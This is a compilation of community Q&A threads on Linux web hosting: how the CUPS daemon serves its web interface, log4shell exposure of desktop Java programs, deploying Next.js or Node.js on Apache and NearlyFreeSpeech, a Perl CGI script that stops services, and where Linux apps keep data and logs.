How CUPS web interface works - linux

I'm wondering how the Common Unix Printing System "CUPS" handels the user actions and affects the configuration files, from my humble background, a webpage only can access/edit files when there is some web server and a serverside script, so how it works without installing web server?
does it work through some shell script? if yes, how that occurs?

It is not the web frontend that alters the configuration files. At least not if you compare it to the 'typical' setup: http server, scripting engine, script.
CUPS itself contains a daemon, this also acts as a minimal web server. That deamon has control over the configuration files. And it is free to accept commands from some web client it serves. So no magic here.
Turned that around you could also setup a system running a 'normal' http server with such rights that is is able to alter all system configuration files. That's all a question of how that server/daemon is setup and started. It breaks down to simple rights management. You certainly do not want to do that, though ;-)

Related

Is a "program" which is not a server application affected by the log4shell vulnerability?

what I do not understand from the log4shell problems... Lets say we have a simple program which uses the log4j module.
Is this program which doesn't serve anything like a webserver or any application which serves an application to the internet/network vulnerable in any way?
Regards
Ubbu
ANY application that uses log4j2 can be vulnerable, also desktop applications, which don't serve anything to the internet as long as the executing system has a connection to the internet enabled.
Reason:
The application is vulnerable, when it logs a certain String. This could be e.g. the content of a file you open with a Java desktop application. If you are tricked to open a prepared file with a known vulnerable desktop application, just opening the file will log the String. This will load arbitrary code from the internet (almost any device is constantly connected to the internet), and executes that code on your machine.
So yes, any java application might be affected. Not limited to server applications serving web content.
IF your program has only static log messages, it is not exploitable. But almost any program logs any kind of "user" input. It's just that you not always know that you are providing a program input right now.
Obviously not. ;)
But if you have a connection to the internet later on then it would be :)

Deploying Next.js to Apache server

I've been developing a Next.js website locally and now want to set it up on my Apache server (with cPanel). However, I'm very new to Next.js and Node apps and not too sure how to go about it.
Has anyone done this successfully? Can you list the required steps and what files should be on the server?
Also, can this be done on a subdomain?
Thank you!
To start with some clear terms just so we're on the same page, there are two or three very different things people mean when they say "server":
A Server Machine is a computer that is connected to the internet that you intend to use to serve something to people on the internet.
A Server Program is some software you run on your Server Machine. The job of the Server Program is to actually calculate the responses to various requests.
A Server as a Service is a webapp provided by a company that stores your code and then puts it onto Server Machines with the right Server Program as needed.
While we're here, let's also define:
A Programming Language is the language your website is written in. Some sites have no language (and are just raw HTML/CSS files that are meant to be returned directly to the user). Many sites, though, have some code that should be run on the server and then the result of that code should be returned to the user.
In your case, you have a Machine whose condition we don't know other than that it is running the Program Apache (or probably "Apache HTTP Server"). Apache HTTP server is very old and proven and pretty good at serving raw files back to users. It can also run some Programming Languages like PHP and return the result.
However, Next.JS is built on top of the Programming Language Javascript, which Apache does not have the ability to run. Next.JS instead wants its Server Program to be Node.
So the problem here is basically that you have a hammer, but only screws. You can't use the tool you have, Apache, to solve the problem you need solved, running Node code and returning the result. To get around this you have two options:
First, you can find a way to access the Server Machine that is currently running Apache and tell it, instead, to run Node pointed at your Next.JS code whenever it starts up. This might not be possible, depending on who owns this machine and how they've set it up.
Second, and probably easier, is to abandon this Machine and instead use a Server as a Service. Heroku, AWS, and Netlify all support Next.JS and have a free tier. The easiest solution, though, is probably to just deploy it on Vercel, which is a Server as a Service run by the same team that makes Next.JS and which has a very generous free tier for you to get started with.
The good news, though, is that yes next.js does totally support being hosted from a subdomain.
Next.JS allows you to build fully functional Node Applications, as well as simple statically-generated sites like Jeckyl or Docpad. If your use case is a simple statically generated site look here: https://nextjs.org/docs/advanced-features/static-html-export
In particular the next build && next export command will create all the HTML and assets necessary to host a site directly via an HTTP server like Apache or Ngnix. Contents will be outputed to an out directory that could serve as the server root.
Pay very close attention to what features are not supported via this approach.

How to start/stop services using Perl CGI script

My aim is to start/stop services(like httpd, sshd, iptables, etc) from a Perl CGI Script.
#!/usr/bin/perl
use strict;
use warnings;
print "content-type:text/html\n\n";
print <<EOM;
<html>
<body>
EOM
`/etc/init.d/httpd stop`;
my $res=`/etc/init.d/httpd status`;
print <<EOM;
<h3>$res</h3>
</body>
</html>
EOM
Here the first command inside back tics isn't working, whereas the second command which is assigned to $res is working.
Output on the browser is as follows:
httpd (pid 15657) is running...
I suggest displaying the output from the stop command. I strongly suspect that you will see an error indicating that you do not have permission to stop the service.
A correctly configured web server process will be owned by a user that has almost no permissions on the system. This is a security feature. CGI programs on your web server can be run by anyone who can access the web server. For that reason, the web server user is usually configured to only run a very limited set of programs.
Starting and stopping your web server is something that you will usually need root permissions for. Your web server process will not have root permissions (for, hopefully, obvious reasons). But it's entirely possible that every user on the system (including the web server user) will have permissions to get the status of the web server process. This is why your httpd status command works, while the httpd stop command doesn't.
You could give the web server user temporary permission to start or stop services, using sudo or something like that. But you would need to do it very carefully - perhaps requiring a password on the web page (and transmitting that password securely over https).
But it's probably a better idea to reconsider this approach completely.
Can I also point that it's a bad idea to use backticks to run external commands that you don't want to collect the output from. In cases like that, it will be more efficient to use the system() function.
I also note, that you are loading the CGI module, but not using any of its functionality. You even manually create your Content-Type header, ignoring the module's header() function.
And here's my traditional admonition that writing new CGI programs in 2017 is a terrible idea. Please read CGI::Alternatives and consider a PSGI-based approach instead.
You should not even think of having a CGI script which has the privileges to start/stop services on a computer. There are, of course, valid reasons to want to have remote control over servers, but if giving the HTTP daemon super user privileges is the only way you can think of achieving that end, you need to realize that you ought not to be the person implementing that functionality.

Nodejs on Nearlyfreespeech?

I'm looking at an existing website, deployed on an NFS server. I'd like to rewrite some portions of it to run on nodejs. As far as I can tell, nodejs isn't supported by the NFS folk, but I am constrained to using their servers.
So, is there a way to shoe-horn nodejs onto a nearlyfreespeech server? Has anyone tried this successfully?
As of 24/September/2014 NFS now support persistent processes:
Intro and overview - More power, more control, more insight, less cost
Official example - How-To: Django on NearlyFreeSpeech.NET
3rd party example - Run node.js on NearlyFreeSpeech.Net
To summarise the process described in mopsled.com's third-party example:
1) In NFS.N's admin UI, select your site's domain shortname under Sites, then change that site's "Server Type" to "Custom" instead of PHP / Apache.
2) Put your Node server code somewhere in /home/protected/
3) Create a shell script (eg run.sh) file somewhere in /home/protected/ that contains the command(s) to start your server (eg npm run start or node server.js). NFS.N will automatically run this script as a continuous process using a "Daemon", which we'll configure in the next step.
4) Select "Daemons" in your site's NFS.N admin UI, and enter your server's startup shell script path in the "command line" field. Complete the other fields as you see fit.
5) NFS.N will now ensure that your custom server process will run indefinitely. Your web server will now be available at the port your server listens at. However, NFS.N doesn't give root access for your server to communicate through the normal "low-level" internet ports (eg :80 and :443), so if you want to serve those, you must use NFS.N's "Proxy" feature described in the next step.
6) If you need to listen on low-level ports: select "Add a Proxy" in your site's NFS.N admin UI and enter the relevant settings, checking the "Bypass Apache entirely" option and giving the port your server is listening on for the "Target Port" option.
That's it! You can now stop/restart the server's continuous process (the shell script that the Daemon is maintaining) in the Daemon's configuration page.
NFS.net have a new "NFGI" architecture that may open the possibility to this:
NFGI can be made to work with other languages as well, making them first-class citizens of our service, just as fast and integrated as PHP currently is. This paves the way for making all sorts of frameworks viable that have traditionally been too slow when run through CGI. Rails. Catalyst. Django. We also believe it can be leveraged to make node.js work on our service, but we’re not 100% sure about that.
(Source: http://blog.nearlyfreespeech.net/2013/09/21/cgissh-upgrades/)
If you want this feature you can vote for it in their feature request system at https://members.nearlyfreespeech.net/support/voting
Although to be honest, I concur with earlier answers, using Node via CGI would lose some of the benefit...but would not be without its charms. Something like http://larsjung.de/node-cgi/ for NFS.net would be an interesting JavaScript replacement for PHP.
The problem is not that NFS.net will not support NodeJS. The thing is that you can't have "long running processes", i.e. servers. Since you can't run servers, you can't run Node.
In fact, the only way you can have anything dynamic there is by using CGI. There's no reason why Javascript engine could not be used to generate pages in response to requests, but I am not sure that can be done with node.

Linux patterns and practices for hosting web application

I work mostly on desktop application on Windows platform. Now I am focusing on Linux platform to host web applications.
While hosting the application on Linux, I don't follow any procedure. I simply CHECKOUT the files from SVN and run the application on home directory. I don't know where to store the application data (example: mysql/postgres or Mongodb or redis, tokyo tyrant). Where to keep the log files.. What is the tip you have when we do the backend maintenance work on the server but display to the user saying that 'maintenance in progress' messages.
How do you host your application on VPS/dedicated/cloud service running Linux application?
Do you have any checklist? Do you have any tips & tricks?
Very broad question
Where do you store application data?. Most people would install MySQL which would properly store the data in /var/lib/mysql and Apache where /var/www is typically used. These applications are usually configured in /etc/apache2 and /etc/mysql.
Where to keep log files?. These almost always goes in to /var/log. For configuration check /etc/syslog.conf
How do you configure a server maintenance message?. Create a HTML file with your message and serve it by configuring apache from /etc/apache2/httpd.conf
How to do virtual Linux servers?. The easiest way is to install an instance on Amazon EC2 or you could use Oracle's VirtualBox (similar to VMWare, but free). You could also try Zen/KVM but these are far form trivial, so unless you have Linux maven around then I would stay clear of these.

Resources